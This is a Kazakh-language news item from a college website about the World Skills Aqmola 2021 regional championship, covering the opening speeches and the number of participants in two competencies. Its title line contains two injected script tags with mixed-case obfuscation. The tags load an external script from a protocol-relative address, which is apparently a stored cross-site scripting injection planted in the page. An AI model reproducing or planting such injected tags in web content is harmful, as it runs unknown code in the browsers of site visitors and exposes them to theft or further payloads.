World Skills Aqmola - 2021 аймақтық чемпионаты жалғасты<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.04.2021

Ағымдағы жылдың 31 наурызы күні, «Красный Яр ауылы, агротехникалық колледжі» МКҚК-да World Skills Aqmola - 2021 аймақтық чемпионаты жалғасты. Сайысты колледж басшысы Сейткалиева Сайран Омирзаковна ашып, қатысушыларға сәттілік тіледі. Қатысушыларға Көкшетау қалалық маслихатының депутаты, Қамқоршылық кеңесінің мүшесі Джусупов Мереке Ертаевич, Ақмола облысы Білім басқармасы ТжКББ бөлімінің бас маманы Мұрат Хайрбекұлы Тоқсанбаев және "Қанай би - 1" ЖШС директоры, бас сарапшы, колледждің ҚК мүшесі Талғат Молдашұлы Қабдулов  алғы тілектерін білдірді.

«Аспап ісі» құзыреті бойынша - 8 қатысты, «Ауыл шаруашылық машинасына қызмет көрсету және жөндеу» құзыреті бойынша - 10 қатысушы кәсіби шеберліктерімен сайысқа түсуде.

Просмотров: 757


Пікір қосу



Деректерді қолтаңбаға қосу